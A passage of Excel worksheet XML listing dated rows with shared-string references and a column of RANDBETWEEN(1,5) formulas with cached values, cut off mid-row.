      <c r="E18872" s="2" t="s">
        <v>16918</v>
      </c>
      <c r="F18872">
        <f t="shared" ca="1" si="294"/>
        <v>5</v>
      </c>
    </row>
    <row r="18873" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18873" s="1">
        <v>43154.084733796299</v>
      </c>
      <c r="C18873" t="s">
        <v>140</v>
      </c>
      <c r="D18873" t="s">
        <v>46</v>
      </c>
      <c r="E18873" s="2" t="s">
        <v>16919</v>
      </c>
      <c r="F18873">
        <f t="shared" ca="1" si="294"/>
        <v>1</v>
      </c>
    </row>
    <row r="18874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18874" s="1">
        <v>43154.063692129632</v>
      </c>
      <c r="C18874" t="s">
        <v>118</v>
      </c>
      <c r="E18874" t="s">
        <v>16920</v>
      </c>
      <c r="F18874">
        <f t="shared" ca="1" si="294"/>
        <v>4</v>
      </c>
    </row>
    <row r="18875" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A18875" s="1">
        <v>43154.003310185188</v>
      </c>
      <c r="C18875" t="s">
        <v>712</v>
      </c>
      <c r="D18875" t="s">
        <v>46</v>
      </c>
      <c r="E18875" s="2" t="s">
        <v>16921</v>
      </c>
      <c r="F18875">
        <f t="shared" ca="1" si="294"/>
        <v>4</v>
      </c>
    </row>
    <row r="18876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18876" s="1">
        <v>43153.9996875</v>
      </c>
      <c r="C18876" t="s">
        <v>41</v>
      </c>
      <c r="E18876" t="s">
        <v>16922</v>
      </c>
      <c r="F18876">
        <f t="shared" ca="1" si="294"/>
        <v>2</v>
      </c>
    </row>
    <row r="18877" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18877" s="1">
        <v>43153.980208333334</v>
      </c>
      <c r="C18877" t="s">
        <v>10</v>
      </c>
      <c r="D18877" t="s">
        <v>89</v>
      </c>
      <c r="E18877" s="2" t="s">
        <v>16923</v>
      </c>
      <c r="F18877">
        <f t="shared" ca="1" si="294"/>
        <v>1</v>
      </c>
    </row>
    <row r="18878" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A18878" s="1">
        <v>43153.906458333331</v>
      </c>
      <c r="C18878" t="s">
        <v>73</v>
      </c>
      <c r="E18878" s="2" t="s">
        <v>16924</v>
      </c>
      <c r="F18878">
        <f t="shared" ca="1" si="294"/>
        <v>4</v>
      </c>
    </row>
    <row r="18879" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18879" s="1">
        <v>43153.809421296297</v>
      </c>
      <c r="C18879" t="s">
        <v>140</v>
      </c>
      <c r="D18879" t="s">
        <v>234</v>
      </c>
      <c r="E18879" s="2" t="s">
        <v>16925</v>
      </c>
      <c r="F18879">
        <f t="shared" ca="1" si="294"/>
        <v>1</v>
      </c>
    </row>
    <row r="18880" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18880" s="1">
        <v>43153.756967592592</v>
      </c>
      <c r="C18880" t="s">
        <v>140</v>
      </c>
      <c r="D18880" t="s">
        <v>750</v>
      </c>
      <c r="E18880" s="2" t="s">
        <v>16926</v>
      </c>
      <c r="F18880">
        <f t="shared" ca="1" si="294"/>
        <v>3</v>
      </c>
    </row>
    <row r="18881" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18881" s="1">
        <v>43153.710879629631</v>
      </c>
      <c r="C18881" t="s">
        <v>10</v>
      </c>
      <c r="D18881" t="s">
        <v>271</v>
      </c>
      <c r="E18881" s="2" t="s">
        <v>16927</v>
      </c>
      <c r="F18881">
        <f t="shared" ca="1" si="294"/>
        <v>1</v>
      </c>
    </row>
    <row r="18882" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18882" s="1">
        <v>43153.698182870372</v>
      </c>
      <c r="C18882" t="s">
        <v>10</v>
      </c>
      <c r="D18882" t="s">
        <v>46</v>
      </c>
      <c r="E18882" s="2" t="s">
        <v>16928</v>
      </c>
      <c r="F18882">
        <f t="shared" ref="F18882:F18945" ca="1" si="295">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="18883" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18883" s="1">
        <v>43153.675532407404</v>
      </c>
      <c r="C18883" t="s">
        <v>10</v>
      </c>
      <c r="D18883" t="s">
        <v>494</v>
      </c>
      <c r="E18883" s="2" t="s">
        <v>16929</v>
      </c>
      <c r="F18883">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18884" s="1">
        <v>43153.661412037036</v>
      </c>
      <c r="C18884" t="s">
        <v>10</v>
      </c>
      <c r="D18884" t="s">
        <v>6</v>
      </c>
      <c r="E18884" t="s">
        <v>16930</v>
      </c>
      <c r="F18884">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18885" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A18885" s="1">
        <v>43153.659953703704</v>
      </c>
      <c r="C18885" t="s">
        <v>10</v>
      </c>
      <c r="D18885" t="s">
        <v>36</v>
      </c>
      <c r="E18885" s="2" t="s">
        <v>16931</v>
      </c>
      <c r="F18885">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18886" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18886" s="1">
        <v>43153.643148148149</v>
      </c>
      <c r="C18886" t="s">
        <v>10</v>
      </c>
      <c r="D18886" t="s">
        <v>36</v>
      </c>
      <c r="E18886" s="2" t="s">
        <v>16932</v>
      </c>
      <c r="F18886">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18887" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18887" s="1">
        <v>43153.627569444441</v>
      </c>
      <c r="C18887" t="s">
        <v>14</v>
      </c>
      <c r="D18887" t="s">
        <v>20</v>
      </c>
      <c r="E18887" s="2" t="s">
        <v>16933</v>
      </c>
      <c r="F18887">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18888" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18888" s="1">
        <v>43153.597245370373</v>
      </c>
      <c r="C18888" t="s">
        <v>69</v>
      </c>
      <c r="D18888" t="s">
        <v>14</v>
      </c>
      <c r="E18888" s="2" t="s">
        <v>16934</v>
      </c>
      <c r="F18888">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18889" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18889" s="1">
        <v>43153.553229166668</v>
      </c>
      <c r="C18889" t="s">
        <v>2428</v>
      </c>
      <c r="D18889" t="s">
        <v>667</v>
      </c>
      <c r="E18889" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18889">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18890" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18890" s="1">
        <v>43153.553171296298</v>
      </c>
      <c r="C18890" t="s">
        <v>2428</v>
      </c>
      <c r="D18890" t="s">
        <v>667</v>
      </c>
      <c r="E18890" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18890">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18891" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18891" s="1">
        <v>43153.541851851849</v>
      </c>
      <c r="C18891" t="s">
        <v>10</v>
      </c>
      <c r="D18891" t="s">
        <v>263</v>
      </c>
      <c r="E18891" s="2" t="s">
        <v>16935</v>
      </c>
      <c r="F18891">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18892" s="1">
        <v>43153.520254629628</v>
      </c>
      <c r="C18892" t="s">
        <v>10</v>
      </c>
      <c r="D18892" t="s">
        <v>89</v>
      </c>
      <c r="E18892" t="s">
        <v>16936</v>
      </c>
      <c r="F18892">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18893" s="1">
        <v>43153.49659722222</v>
      </c>
      <c r="C18893" t="s">
        <v>258</v>
      </c>
      <c r="D18893" t="s">
        <v>312</v>
      </c>
      <c r="E18893" t="s">
        <v>16937</v>
      </c>
      <c r="F18893">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18894" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18894" s="1">
        <v>43153.495925925927</v>
      </c>
      <c r="C18894" t="s">
        <v>2986</v>
      </c>
      <c r="E18894" s="2" t="s">
        <v>16938</v>
      </c>
      <c r="F18894">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18895" s="1">
        <v>43153.487546296295</v>
      </c>
      <c r="C18895" t="s">
        <v>16</v>
      </c>
      <c r="E18895" t="s">
        <v>16939</v>
      </c>
      <c r="F18895">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18896" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18896" s="1">
        <v>43153.484456018516</v>
      </c>
      <c r="C18896" t="s">
        <v>586</v>
      </c>
      <c r="D18896" t="s">
        <v>151</v>
      </c>
      <c r="E18896" s="2" t="s">
        <v>16864</v>
      </c>
      <c r="F18896">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18897" s="1">
        <v>43153.476284722223</v>
      </c>
      <c r="C18897" t="s">
        <v>10</v>
      </c>
      <c r="D18897" t="s">
        <v>6</v>
      </c>
      <c r="E18897" t="s">
        <v>16940</v>
      </c>
      <c r="F18897">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18898" s="1">
        <v>43153.447708333333</v>
      </c>
      <c r="C18898" t="s">
        <v>10</v>
      </c>
      <c r="D18898" t="s">
        <v>86</v>
      </c>
      <c r="E18898" t="s">
        <v>16941</v>
      </c>
      <c r="F18898">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18899" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18899" s="1">
        <v>43153.445706018516</v>
      </c>
      <c r="C18899" t="s">
        <v>3994</v>
      </c>
      <c r="D18899" t="s">
        <v>713</v>
      </c>
      <c r="E18899" s="2" t="s">
        <v>16942</v>
      </c>
      <c r="F18899">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18900" s="1">
        <v>43153.442164351851</v>
      </c>
      <c r="C18900" t="s">
        <v>10</v>
      </c>
      <c r="D18900" t="s">
        <v>36</v>
      </c>
      <c r="E18900" t="s">
        <v>16943</v>
      </c>
      <c r="F18900">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18901" s="1">
        <v>43153.440486111111</v>
      </c>
      <c r="C18901" t="s">
        <v>6</v>
      </c>
      <c r="D18901" t="s">
        <v>25</v>
      </c>
      <c r="E18901" t="s">
        <v>16944</v>
      </c>
      <c r="F18901">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18902" s="1">
        <v>43153.438310185185</v>
      </c>
      <c r="C18902" t="s">
        <v>10</v>
      </c>
      <c r="D18902" t="s">
        <v>80</v>
      </c>
      <c r="E18902" t="s">
        <v>16945</v>
      </c>
      <c r="F18902">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18903" s="1">
        <v>43153.426840277774</v>
      </c>
      <c r="C18903" t="s">
        <v>10</v>
      </c>
      <c r="D18903" t="s">
        <v>23</v>
      </c>
      <c r="E18903" t="s">
        <v>16946</v>
      </c>
      <c r="F18903">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18904" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18904" s="1">
        <v>43153.42260416667</v>
      </c>
      <c r="C18904" t="s">
        <v>173</v>
      </c>
      <c r="E18904" s="2" t="s">
        <v>16947</v>
      </c>
      <c r="F18904">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18905" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18905" s="1">
        <v>43153.412858796299</v>
      </c>
      <c r="C18905" t="s">
        <v>1325</v>
      </c>
      <c r="E18905" s="2" t="s">
        <v>16948</v>
      </c>
      <c r="F18905">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18906" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18906" s="1">
        <v>43153.392534722225</v>
      </c>
      <c r="C18906" t="s">
        <v>43</v>
      </c>
      <c r="E18906" s="2" t="s">
        <v>16949</v>
      </c>
      <c r="F18906">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18907" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18907" s="1">
        <v>43153.388773148145</v>
      </c>
      <c r="C18907" t="s">
        <v>776</v>
      </c>
      <c r="E18907" s="2" t="s">
        <v>16950</v>
      </c>
      <c r="F18907">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18908" s="1">
        <v>43153.38685185185</v>
      </c>
      <c r="C18908" t="s">
        <v>10</v>
      </c>
      <c r="D18908" t="s">
        <v>290</v>
      </c>
      <c r="E18908" t="s">
        <v>16951</v>
      </c>
      <c r="F18908">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18909" s="1">
        <v>43153.367743055554</v>
      </c>
      <c r="C18909" t="s">
        <v>10</v>
      </c>
      <c r="D18909" t="s">
        <v>20</v>
      </c>
      <c r="E18909" t="s">
        <v>16952</v>
      </c>
      <c r="F18909">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18910" s="1">
        <v>43153.335011574076</v>
      </c>
      <c r="C18910" t="s">
        <v>10</v>
      </c>
      <c r="D18910" t="s">
        <v>6</v>
      </c>
      <c r="E18910" t="s">
        <v>16953</v>
      </c>
      <c r="F18910">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18911" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18911" s="1">
        <v>43153.333067129628</v>
      </c>
      <c r="C18911" t="s">
        <v>48</v>
      </c>
      <c r="E18911" s="2" t="s">
        <v>16954</v>
      </c>
      <c r="F18911">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18912" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18912" s="1">
        <v>43153.323495370372</v>
      </c>
      <c r="C18912" t="s">
        <v>69</v>
      </c>
      <c r="D18912" t="s">
        <v>480</v>
      </c>
      <c r="E18912" s="2" t="s">
        <v>16955</v>
      </c>
      <c r="F18912">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18913" s="1">
        <v>43153.313263888886</v>
      </c>
      <c r="C18913" t="s">
        <v>48</v>
      </c>
      <c r="E18913" t="s">
        <v>16956</v>
      </c>
      <c r="F18913">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18914" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18914" s="1">
        <v>43153.298784722225</v>
      </c>
      <c r="C18914" t="s">
        <v>41</v>
      </c>
      <c r="E18914" s="2" t="s">
        <v>16957</v>
      </c>
      <c r="F18914">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18915" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18915" s="1">
        <v>43153.272604166668</v>
      </c>
      <c r="C18915" t="s">
        <v>14</v>
      </c>
      <c r="D18915" t="s">
        <v>114</v>
      </c>
      <c r="E18915" s="2" t="s">
        <v>16958</v>
      </c>
      <c r="F18915">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18916" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18916" s="1">
        <v>43153.268437500003</v>
      </c>
      <c r="C18916" t="s">
        <v>41</v>
      </c>
      <c r="E18916" s="2" t="s">
        <v>16959</v>
      </c>
      <c r="F18916">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18917" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18917" s="1">
        <v>43153.210370370369</v>
      </c>
      <c r="C18917" t="s">
        <v>60</v>
      </c>
      <c r="E18917" s="2" t="s">
        <v>16960</v>
      </c>
      <c r="F18917">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18918" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18918" s="1">
        <v>43153.200208333335</v>
      </c>
      <c r="C18918" t="s">
        <v>559</v>
      </c>
      <c r="E18918" s="2" t="s">
        <v>16961</v>
      </c>
      <c r="F18918">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18919" s="1">
        <v>43153.198298611111</v>
      </c>
      <c r="C18919" t="s">
        <v>1050</v>
      </c>
      <c r="F18919">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18920" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18920" s="1">
        <v>43153.197592592594</v>
      </c>
      <c r="C18920" t="s">
        <v>1050</v>
      </c>
      <c r="E18920" s="2" t="s">
        <v>16962</v>
      </c>
      <c r="F18920">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18921" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18921" s="1">
        <v>43153.196793981479</v>
      </c>
      <c r="C18921" t="s">
        <v>1050</v>
      </c>
      <c r="E18921" s="2" t="s">
        <v>16963</v>
      </c>
      <c r="F18921">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18922" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18922" s="1">
        <v>43153.195196759261</v>
      </c>
      <c r="C18922" t="s">
        <v>173</v>
      </c>
      <c r="E18922" s="2" t="s">
        <v>16964</v>
      </c>
      <c r="F18922">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18923" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18923" s="1">
        <v>43153.182060185187</v>
      </c>
      <c r="C18923" t="s">
        <v>461</v>
      </c>
      <c r="E18923" s="2" t="s">
        <v>16965</v>
      </c>
      <c r="F18923">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18924" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18924" s="1">
        <v>43153.180856481478</v>
      </c>
      <c r="C18924" t="s">
        <v>48</v>
      </c>
      <c r="E18924" s="2" t="s">
        <v>16966</v>
      </c>
      <c r="F18924">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18925" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18925" s="1">
        <v>43153.176157407404</v>
      </c>
      <c r="C18925" t="s">
        <v>69</v>
      </c>
      <c r="E18925" s="2" t="s">
        <v>16967</v>
      </c>
      <c r="F18925">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18926" s="1">
        <v>43153.162615740737</v>
      </c>
      <c r="C18926" t="s">
        <v>60</v>
      </c>
      <c r="E18926" t="s">
        <v>16968</v>
      </c>
      <c r="F18926">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18927" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18927" s="1">
        <v>43153.138865740744</v>
      </c>
      <c r="C18927" t="s">
        <v>1130</v>
      </c>
      <c r="E18927" s="2" t="s">
        <v>16969</v>
      </c>
      <c r="F18927">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18928" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A18928" s="1">
        <v>43153.106689814813</v>
      </c>
      <c r="C18928" t="s">
        <v>41</v>
      </c>
      <c r="E18928" s="2" t="s">
        <v>16970</v>
      </c>
      <c r="F18928">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18929" s="1">
        <v>43153.096828703703</v>
      </c>
      <c r="C18929" t="s">
        <v>41</v>
      </c>
      <c r="E18929" t="s">
        <v>16971</v>
      </c>
      <c r="F18929">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18930" s="1">
        <v>43153.051388888889</v>
      </c>
      <c r="C18930" t="s">
        <v>41</v>
      </c>
      <c r="E18930" t="s">
        <v>16972</v>
      </c>
      <c r="F18930">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18931" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18931" s="1">
        <v>43153.047384259262</v>
      </c>
      <c r="C18931" t="s">
        <v>41</v>
      </c>
      <c r="E18931" s="2" t="s">
        <v>16973</v>
      </c>
      <c r="F18931">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18932" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A18932" s="1">
        <v>43153.023634259262</v>
      </c>
      <c r="C18932" t="s">
        <v>4852</v>
      </c>
      <c r="D18932" t="s">
        <v>158</v>
      </c>
      <c r="E18932" s="2" t="s">
        <v>16974</v>
      </c>
      <c r="F18932">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18933" s="1">
        <v>43153.00104166667</v>
      </c>
      <c r="C18933" t="s">
        <v>41</v>
      </c>
      <c r="E18933" t="s">
        <v>16975</v>
      </c>
      <c r="F18933">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18934" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18934" s="1">
        <v>43152.967245370368</v>
      </c>
      <c r="C18934" t="s">
        <v>8872</v>
      </c>
      <c r="D18934" t="s">
        <v>602</v>
      </c>
      <c r="E18934" s="2" t="s">
        <v>16976</v>
      </c>
      <c r="F18934">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18935" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18935" s="1">
        <v>43152.965509259258</v>
      </c>
      <c r="C18935" t="s">
        <v>8872</v>
      </c>
      <c r="D18935" t="s">
        <v>713</v>
      </c>
      <c r="E18935" s="2" t="s">
        <v>16977</v>
      </c>
      <c r="F18935">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18936" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18936" s="1">
        <v>43152.952951388892</v>
      </c>
      <c r="C18936" t="s">
        <v>4508</v>
      </c>
      <c r="D18936" t="s">
        <v>163</v>
      </c>
      <c r="E18936" s="2" t="s">
        <v>16978</v>
      </c>
      <c r="F18936">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18937" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18937" s="1">
        <v>43152.891423611109</v>
      </c>
      <c r="C18937" t="s">
        <v>319</v>
      </c>
      <c r="D18937" t="s">
        <v>15998</v>
      </c>
      <c r="E18937" s="2" t="s">
        <v>16979</v>
      </c>
      <c r="F18937">
        <f t="shared" ca="1" si="295"/>
        <v>2</v>
      </c>
    </row>
    <row r="18938" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18938" s="1">
        <v>43152.886087962965</v>
      </c>
      <c r="C18938" t="s">
        <v>14</v>
      </c>
      <c r="D18938" t="s">
        <v>602</v>
      </c>
      <c r="E18938" s="2" t="s">
        <v>16980</v>
      </c>
      <c r="F18938">
        <f t="shared" ca="1" si="295"/>
        <v>5</v>
      </c>
    </row>
    <row r="18939" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18939" s="1">
        <v>43152.86954861111</v>
      </c>
      <c r="C18939" t="s">
        <v>10</v>
      </c>
      <c r="D18939" t="s">
        <v>6</v>
      </c>
      <c r="E18939" s="2" t="s">
        <v>16981</v>
      </c>
      <c r="F18939">
        <f t="shared" ca="1" si="295"/>
        <v>4</v>
      </c>
    </row>
    <row r="18940" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18940" s="1">
        <v>43152.768865740742</v>
      </c>
      <c r="C18940" t="s">
        <v>8872</v>
      </c>
      <c r="D18940" t="s">
        <v>107</v>
      </c>
      <c r="E18940" s="2" t="s">
        <v>16982</v>
      </c>
      <c r="F18940">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18941" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18941" s="1">
        <v>43152.765787037039</v>
      </c>
      <c r="C18941" t="s">
        <v>140</v>
      </c>
      <c r="D18941" t="s">
        <v>141</v>
      </c>
      <c r="E18941" s="2" t="s">
        <v>16983</v>
      </c>
      <c r="F18941">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18942" s="1">
        <v>43152.737118055556</v>
      </c>
      <c r="C18942" t="s">
        <v>10</v>
      </c>
      <c r="D18942" t="s">
        <v>271</v>
      </c>
      <c r="E18942" t="s">
        <v>16984</v>
      </c>
      <c r="F18942">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18943" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18943" s="1">
        <v>43152.647743055553</v>
      </c>
      <c r="C18943" t="s">
        <v>6</v>
      </c>
      <c r="D18943" t="s">
        <v>194</v>
      </c>
      <c r="E18943" s="2" t="s">
        <v>16985</v>
      </c>
      <c r="F18943">
        <f t="shared" ca="1" si="295"/>
        <v>3</v>
      </c>
    </row>
    <row r="18944" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18944" s="1">
        <v>43152.644479166665</v>
      </c>
      <c r="C18944" t="s">
        <v>10</v>
      </c>
      <c r="D18944" t="s">
        <v>33</v>
      </c>
      <c r="E18944" s="2" t="s">
        <v>16986</v>
      </c>
      <c r="F18944">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18945" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18945" s="1">
        <v>43152.613657407404</v>
      </c>
      <c r="C18945" t="s">
        <v>6</v>
      </c>
      <c r="D18945" t="s">
        <v>67</v>
      </c>
      <c r="E18945" t="s">
        <v>16987</v>
      </c>
      <c r="F18945">
        <f t="shared" ca="1" si="295"/>
        <v>1</v>
      </c>
    </row>
    <row r="18946" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18946" s="1">
        <v>43152.593506944446</v>
      </c>
      <c r="C18946" t="s">
        <v>10</v>
      </c>
      <c r="D18946" t="s">
        <v>192</v>
      </c>
      <c r="E18946" s="2" t="s">
        <v>16988</v>
      </c>
      <c r="F18946">
        <f t="shared" ref="F18946:F19009" ca="1" si="296">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="18947" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18947" s="1">
        <v>43152.590069444443</v>
      </c>
      <c r="C18947" t="s">
        <v>559</v>
      </c>
      <c r="D18947" t="s">
        <v>336</v>
      </c>
      <c r="E18947" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="F18947">
        <f t="shared" ca="1" si="296"/>
        <v>2</v>
      </c>
    </row>
    <row r="18948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18948" s="1">
        <v>43152.582349537035</v>
      </c>
      <c r="C18948" t="s">
        <v>48</v>
      </c>
      <c r="E18948" t="s">
        <v>16989</v>
      </c>
      <c r="F18948">
        <f t="shared" ca="1" si="296"/>
        <v>2</v>
      </c>
    </row>
    <row r="18949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18949" s="1">
        <v>43152.581574074073</v>
      </c>
      <c r="C18949" t="s">
        <v>154</v>
      </c>
      <c r="D18949" t="s">
        <v>33</v>
      </c>
